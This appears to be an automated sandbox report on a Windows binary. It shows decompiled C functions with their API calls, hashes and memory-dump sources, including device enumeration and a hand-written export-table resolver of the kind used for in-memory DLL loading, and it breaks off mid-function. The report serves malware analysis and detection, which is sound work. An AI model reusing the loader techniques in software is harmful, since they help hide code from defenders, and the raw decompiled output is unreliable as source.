                                                                                                                                                      0x004035c8
                                                                                                                                                      0x004035ca
                                                                                                                                                      0x004035e1
                                                                                                                                                      0x004035ed
                                                                                                                                                      0x004035fa
                                                                                                                                                      0x00403600
                                                                                                                                                      0x0040360b
                                                                                                                                                      0x0040361a
                                                                                                                                                      0x0040362b
                                                                                                                                                      0x0040362d
                                                                                                                                                      0x00403630
                                                                                                                                                      0x00403635
                                                                                                                                                      0x0040362d
                                                                                                                                                      0x00403639
                                                                                                                                                      0x00403647
                                                                                                                                                      0x004035a1
                                                                                                                                                      0x004035a7
                                                                                                                                                      0x004035a7

                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403577
                                                                                                                                                      • SetupDiGetClassDevsA.SETUPAPI(?,00000000,00000000,00000012), ref: 00403593
                                                                                                                                                      • SetupDiEnumDeviceInterfaces.SETUPAPI ref: 004035C0
                                                                                                                                                      • SetupDiGetDeviceInterfaceDetailA.SETUPAPI(00000000,?,00000000,00000000,00000000,00000000), ref: 004035E1
                                                                                                                                                      • SetupDiGetDeviceInterfaceDetailA.SETUPAPI(00000000,?,00000000,?,?,00000000), ref: 0040360B
                                                                                                                                                      • CreateFileA.KERNEL32(00000004,C0000000,00000001,00000000,00000003,00000800,00000000,?,?,?,?,?,?,?,?,00401200), ref: 00403623
                                                                                                                                                      • SetupDiDestroyDeviceInfoList.SETUPAPI(00000000), ref: 00403639
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Setup$Device$DetailInterface$ClassCountCreateDestroyDevsEnumFileInfoInterfacesListTick
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 280619443-0
                                                                                                                                                      • Opcode ID: 82c272d572808aedcab37959c7018c9105322b92b1be9a593f462cfc53fd61eb
                                                                                                                                                      • Instruction ID: 2111d22678be0be0e8fa47b01a7fb7e7f4be4bb325cb1ef0c0c3e92b1a604571
                                                                                                                                                      • Opcode Fuzzy Hash: 82c272d572808aedcab37959c7018c9105322b92b1be9a593f462cfc53fd61eb
                                                                                                                                                      • Instruction Fuzzy Hash: CA2183716403007FE3109F50DD85FAB77ACEB84754F50453DFA45AA2D0E7B8E90987AA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004090EB, Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                      			E004090EB(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x40b760);
				_push(E00405E4C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x410a18; // 0x0
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x410818; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E004038A0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00407CC0(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x410808; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x40b6e8, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x40b6e4, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x410a18 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}





















                                                                                                                                                      0x004090ee
                                                                                                                                                      0x004090f0
                                                                                                                                                      0x004090f5
                                                                                                                                                      0x00409100
                                                                                                                                                      0x00409101
                                                                                                                                                      0x00409108
                                                                                                                                                      0x0040910e
                                                                                                                                                      0x00409111
                                                                                                                                                      0x0040911a
                                                                                                                                                      0x0040915a
                                                                                                                                                      0x0040915d
                                                                                                                                                      0x00409186
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040918c
                                                                                                                                                      0x0040918f
                                                                                                                                                      0x00409191
                                                                                                                                                      0x00409196
                                                                                                                                                      0x00409196
                                                                                                                                                      0x004091a6
                                                                                                                                                      0x004091b0
                                                                                                                                                      0x004091b6
                                                                                                                                                      0x004091bb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004091bd
                                                                                                                                                      0x004091bd
                                                                                                                                                      0x004091ca
                                                                                                                                                      0x004091cf
                                                                                                                                                      0x004091d2
                                                                                                                                                      0x004091d4
                                                                                                                                                      0x004091da
                                                                                                                                                      0x004091ef
                                                                                                                                                      0x004091f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004091f7
                                                                                                                                                      0x00409206
                                                                                                                                                      0x0040920e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409210
                                                                                                                                                      0x00409218
                                                                                                                                                      0x00409218
                                                                                                                                                      0x0040920e
                                                                                                                                                      0x004091f5
                                                                                                                                                      0x004091bb
                                                                                                                                                      0x0040915f
                                                                                                                                                      0x0040915f
                                                                                                                                                      0x00409164
                                                                                                                                                      0x00409166
                                                                                                                                                      0x00409166
                                                                                                                                                      0x00409178
                                                                                                                                                      0x00409178
                                                                                                                                                      0x0040911c
                                                                                                                                                      0x0040911f
                                                                                                                                                      0x00409122
                                                                                                                                                      0x00409132
                                                                                                                                                      0x0040914c
                                                                                                                                                      0x00409220
                                                                                                                                                      0x00409220
                                                                                                                                                      0x00409152
                                                                                                                                                      0x00409154
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409154
                                                                                                                                                      0x00409134
                                                                                                                                                      0x00409134
                                                                                                                                                      0x00409155
                                                                                                                                                      0x00409155
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409155
                                                                                                                                                      0x00409132
                                                                                                                                                      0x00409228
                                                                                                                                                      0x00409233

                                                                                                                                                      APIs
                                                                                                                                                      • GetStringTypeW.KERNEL32(00000001,0040B6E8,00000001,00000000,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040912A
                                                                                                                                                      • GetStringTypeA.KERNEL32(00000000,00000001,0040B6E4,00000001,00000000,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409144
                                                                                                                                                      • GetStringTypeA.KERNEL32(00000000,00000000,?,00000100,00000020,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409178
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000101,?,00000100,00000000,00000000,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 004091B0
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000100,?,00000100,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409206
                                                                                                                                                      • GetStringTypeW.KERNEL32(00000000,?,00000000,00000020,?,00000100,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409218
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: StringType$ByteCharMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3852931651-0
                                                                                                                                                      • Opcode ID: 04c946430f380f41b092c234e871969b9f2bcbd970ef16b0294540a403549ed5
                                                                                                                                                      • Instruction ID: 9475de8012dced2f5ac8a1150185371de60179b956b0b8ca1f619be50ce79b23
                                                                                                                                                      • Opcode Fuzzy Hash: 04c946430f380f41b092c234e871969b9f2bcbd970ef16b0294540a403549ed5
                                                                                                                                                      • Instruction Fuzzy Hash: A7415B72A4020AFFDB109F94DC89EEF7B68EB09750F10493AF911A6291C3399D518BD9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004012C0, Relevance: 9.0, APIs: 6, Instructions: 46windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E004012C0(struct HDC__* _a4, void* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				void _v36;
				int _v40;
				int _v44;
				void* _v56;
				struct HDC__* _t10;
				void* _t18;
				struct HDC__* _t23;
				struct HDC__* _t24;

				_t23 = _a4;
				_t10 = CreateCompatibleDC(_t23);
				_t18 = _a12;
				_t24 = _t10;
				_v8 = SelectObject(_t24, _t18);
				GetObjectA(_t18, 0x18,  &_v36);
				BitBlt(_t23, _v16, _v12, _v44, _v40, _t24, 0, 0, 0xcc0020);
				SelectObject(_t24, _v56);
				return DeleteDC(_t24);
			}














                                                                                                                                                      0x004012c7
                                                                                                                                                      0x004012cc
                                                                                                                                                      0x004012d2
                                                                                                                                                      0x004012dc
                                                                                                                                                      0x004012e2
                                                                                                                                                      0x004012ee
                                                                                                                                                      0x00401313
                                                                                                                                                      0x0040131f
                                                                                                                                                      0x0040132f

                                                                                                                                                      APIs
                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 004012CC
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 004012E0
                                                                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 004012EE
                                                                                                                                                      • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 00401313
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0040131F
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00401322
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Object$Select$CompatibleCreateDelete
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2280115113-0
                                                                                                                                                      • Opcode ID: 97d30cea3b4848ec61989ca9b3a25616bbb10135de2f2940fa573a013330b45f
                                                                                                                                                      • Instruction ID: f2e8a14a8be1bbbb7043d571baa78ab61f6b2ffc4645eec57c6b3d27f00c4ef2
                                                                                                                                                      • Opcode Fuzzy Hash: 97d30cea3b4848ec61989ca9b3a25616bbb10135de2f2940fa573a013330b45f
                                                                                                                                                      • Instruction Fuzzy Hash: A7014B75205304BFD200AB14DD89E7FBBBCEBC9A61F004519FA55A2251C734AD058BBA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001AEB0, Relevance: 8.9, APIs: 7, Instructions: 168COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001AEB0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				intOrPtr* _t105;
				void* _t174;
				void* _t176;

				_t172 = __edi;
				_t122 = __ebx;
				_v16 = _a4;
				_t4 = _v16 + 4; // 0x7d83ec45
				_v24 =  *_t4;
				_v12 = 0;
				_v20 =  *_v16 + 0x78;
				if( *((intOrPtr*)(_v20 + 4)) != 0) {
					_v8 = _v24 +  *_v20;
					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							if( *(_v8 + 0x18) != 0) {
								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
									L19:
									_t70 = _v16 + 0x30; // 0x51e84d8b
									_v28 = E1000DF58(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AA60);
									if(_v28 != 0) {
										_v12 =  *(_v28 + 4) & 0x0000ffff;
										L22:
										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
										}
										SetLastError(0x7f);
										return 0;
									}
									SetLastError(0x7f);
									return 0;
								}
								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
								_t105 = L1000CE56(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
								_t176 = _t174 + 4;
								_v44 = _t105;
								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
								if(_v44 != 0) {
									_v32 = 0;
									while(_v32 <  *(_v8 + 0x18)) {
										 *_v44 = _v24 +  *_v36;
										 *((short*)(_v44 + 4)) =  *_v40;
										_v32 = _v32 + 1;
										_v36 = _v36 + 4;
										_v40 = _v40 + 2;
										_v44 = _v44 + 8;
									}
									_t66 = _v16 + 0x30; // 0x51e84d8b
									E1000D9D0( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AA90);
									_t174 = _t176 + 0x10;
									goto L19;
								}
								SetLastError(0xe);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L22;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}
















                                                                                                                                                      0x1001aeb0
                                                                                                                                                      0x1001aeb0
                                                                                                                                                      0x1001aeb9
                                                                                                                                                      0x1001aebf
                                                                                                                                                      0x1001aec2
                                                                                                                                                      0x1001aec5
                                                                                                                                                      0x1001aed4
                                                                                                                                                      0x1001aede
                                                                                                                                                      0x1001aef7
                                                                                                                                                      0x1001af01
                                                                                                                                                      0x1001af0e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001af1b
                                                                                                                                                      0x1001af26
                                                                                                                                                      0x1001af6a
                                                                                                                                                      0x1001af87
                                                                                                                                                      0x1001b049
                                                                                                                                                      0x1001b05a
                                                                                                                                                      0x1001b06a
                                                                                                                                                      0x1001b071
                                                                                                                                                      0x1001b086
                                                                                                                                                      0x1001b089
                                                                                                                                                      0x1001b092
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b0b2
                                                                                                                                                      0x1001b096
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b09c
                                                                                                                                                      0x1001b075
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b07b
                                                                                                                                                      0x1001af96
                                                                                                                                                      0x1001afa2
                                                                                                                                                      0x1001afaf
                                                                                                                                                      0x1001afb4
                                                                                                                                                      0x1001afb7
                                                                                                                                                      0x1001afc0
                                                                                                                                                      0x1001afc7
                                                                                                                                                      0x1001afd8
                                                                                                                                                      0x1001b005
                                                                                                                                                      0x1001b01b
                                                                                                                                                      0x1001b026
                                                                                                                                                      0x1001afe7
                                                                                                                                                      0x1001aff0
                                                                                                                                                      0x1001aff9
                                                                                                                                                      0x1001b002
                                                                                                                                                      0x1001b002
                                                                                                                                                      0x1001b03d
                                                                                                                                                      0x1001b041
                                                                                                                                                      0x1001b046
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b046
                                                                                                                                                      0x1001afcb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001afd1
                                                                                                                                                      0x1001af6e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001af74
                                                                                                                                                      0x1001af39
                                                                                                                                                      0x1001af5b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001af5b
                                                                                                                                                      0x1001af3d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001af43
                                                                                                                                                      0x1001af01
                                                                                                                                                      0x1001aee2
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AEE2
                                                                                                                                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AF0E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                      • Opcode ID: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                      • Instruction ID: 0b553024b132d835b53bcc3061d3cd906e00f9f3519ff007c74d2c873b7cba87
                                                                                                                                                      • Opcode Fuzzy Hash: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                      • Instruction Fuzzy Hash: A071D274A00249EFDB04CF94C994AAEB7F1FF48304F618199E915AB341D735EE81CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00401070, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 59%
                                                                                                                                                      			E00401070() {
				char _v4;
				signed int _v12;
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;
				void* _t5;
				signed int _t6;
				_Unknown_base(*)()* _t11;

				_t3 = GetModuleHandleA("Kernel32.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "IsWow64Process");
					_t11 = _t4;
					if(_t11 != 0) {
						_t5 = GetCurrentProcess();
						if(_t5 != 0) {
							_t6 =  *_t11(_t5,  &_v4);
							asm("sbb eax, eax");
							return  ~_t6 & _v12;
						} else {
							return _t5;
						}
					} else {
						return _t4;
					}
				} else {
					return _t3;
				}
			}










                                                                                                                                                      0x00401077
                                                                                                                                                      0x0040107f
                                                                                                                                                      0x0040108a
                                                                                                                                                      0x00401090
                                                                                                                                                      0x00401094
                                                                                                                                                      0x00401099
                                                                                                                                                      0x004010a1
                                                                                                                                                      0x004010ac
                                                                                                                                                      0x004010b5
                                                                                                                                                      0x004010ba
                                                                                                                                                      0x004010a5
                                                                                                                                                      0x004010a5
                                                                                                                                                      0x004010a5
                                                                                                                                                      0x00401098
                                                                                                                                                      0x00401098
                                                                                                                                                      0x00401098
                                                                                                                                                      0x00401083
                                                                                                                                                      0x00401083
                                                                                                                                                      0x00401083

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(Kernel32.dll), ref: 00401077
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040108A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                      • String ID: IsWow64Process$Kernel32.dll
                                                                                                                                                      • API String ID: 1646373207-2893920747
                                                                                                                                                      • Opcode ID: de38f9ad0efdbed7fc00bdec0d918f1e73f141aa4d7654630022051159688da3
                                                                                                                                                      • Instruction ID: 0f79affc76f9381138ebf103281d235305e31b8f574dc99244aa29f60611ee23
                                                                                                                                                      • Opcode Fuzzy Hash: de38f9ad0efdbed7fc00bdec0d918f1e73f141aa4d7654630022051159688da3
                                                                                                                                                      • Instruction Fuzzy Hash: EEE09BB36512216FD62417B8BC09EE76798DD90B63324453FF543E65D0EF3CD8405698
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10013389, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                      			E10013389(void* __ebx, void* __esi) {
				void* _t1;
				long _t5;
				void* _t9;
				void* _t11;
				void* _t15;

				_t9 = __ebx;
				_t1 = TlsGetValue( *0x10332c6c);
				_t16 = _t1;
				if(_t1 != 0) {
					_push( *0x10332c68);
					_t11 =  *(TlsGetValue( *0x10332c6c))();
				}
				_pop(_t15);
				_push(0);
				_push( *0x10332c68);
				 *((intOrPtr*)(E10013034( *0x10333820)))();
				_push(_t11);
				L10013256(_t9, _t11, _t15, _t16);
				_t5 =  *0x10332c6c; // 0x1d
				if(_t5 != 0xffffffff) {
					return TlsSetValue(_t5, 0);
				}
				return _t5;
			}








                                                                                                                                                      0x10013389
                                                                                                                                                      0x10013396
                                                                                                                                                      0x10013398
                                                                                                                                                      0x1001339a
                                                                                                                                                      0x1001339c
                                                                                                                                                      0x100133ac
                                                                                                                                                      0x100133ac
                                                                                                                                                      0x100133ae
                                                                                                                                                      0x100133af
                                                                                                                                                      0x100133b1
                                                                                                                                                      0x100133c3
                                                                                                                                                      0x100133c5
                                                                                                                                                      0x100133c6
                                                                                                                                                      0x100133cc
                                                                                                                                                      0x100133d4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100133d9
                                                                                                                                                      0x100133df

                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 10013396
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 100133A8
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 100133BD
                                                                                                                                                      • TlsSetValue.KERNEL32(0000001D,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240,0000000C,1000EBE7), ref: 100133D9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$__decode_pointer
                                                                                                                                                      • String ID: tj
                                                                                                                                                      • API String ID: 3389472636-3491506833
                                                                                                                                                      • Opcode ID: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
                                                                                                                                                      • Instruction ID: a5e655cd75536ae3ffa2bd70bd2a424c71ddb38a18ae7223bb1ec647065a0f02
                                                                                                                                                      • Opcode Fuzzy Hash: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
                                                                                                                                                      • Instruction Fuzzy Hash: CDE06D31500120AEDA12A768DCC4B5D3FAAFB84260F249111F418DE1B1CF31DE96DA54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019960, Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 33%
                                                                                                                                                      			E10019960(void* __ebx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v44;
				char _v48;
				char _v312;
				char _v572;
				char _v832;
				char _v1092;
				char _v1352;
				char _v1368;
				char _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				signed int _v1384;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t74;
				intOrPtr _t80;
				void* _t85;
				void* _t88;
				void* _t91;
				void* _t94;
				void* _t97;
				void* _t116;
				signed int _t150;
				void* _t164;
				void* _t168;
				void* _t171;
				void* _t174;
				void* _t177;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				intOrPtr _t187;
				void* _t188;
				void* _t189;
				void* _t191;
				void* _t193;
				void* _t194;
				void* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t202;
				void* _t203;

				_t116 = __ebx;
				 *[fs:0x0] = _t187;
				_t188 = _t187 - 0x558;
				_v1384 = 0;
				_t74 = E10003170( &_v1368, __eflags);
				_v8 = 0;
				_v1376 = 0;
				_v48 = 0;
				_v1372 = 0;
				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E10022A8C, 0xffffffff);
				_v1380 = _t74;
				if(_v1380 != 0xffffffff) {
					E1000CF20(_t164,  &_v44, 0, 0x1c);
					_t189 = _t188 + 0xc;
					_v44 = 0x1c;
					while(1) {
						_t148 = _v1376;
						_t80 = _v1380;
						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
						if(_t80 == 0) {
							break;
						}
						E1000CF20(_t164,  &_v1352, 0, 0x514);
						_push( &_v1372);
						_push( &_v48);
						_push(0);
						_t191 = _t189 + 0xc - 0x1c;
						_t182 =  &_v44;
						memcpy(_t191, _t182, 7 << 2);
						_t168 = _t182 + 0xe;
						_push(_v1380);
						_t85 = E10019780(_t116, _t182);
						_t193 = _t191 + 0x38;
						_t213 = _t85;
						if(_t85 != 0) {
							E1000D190(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
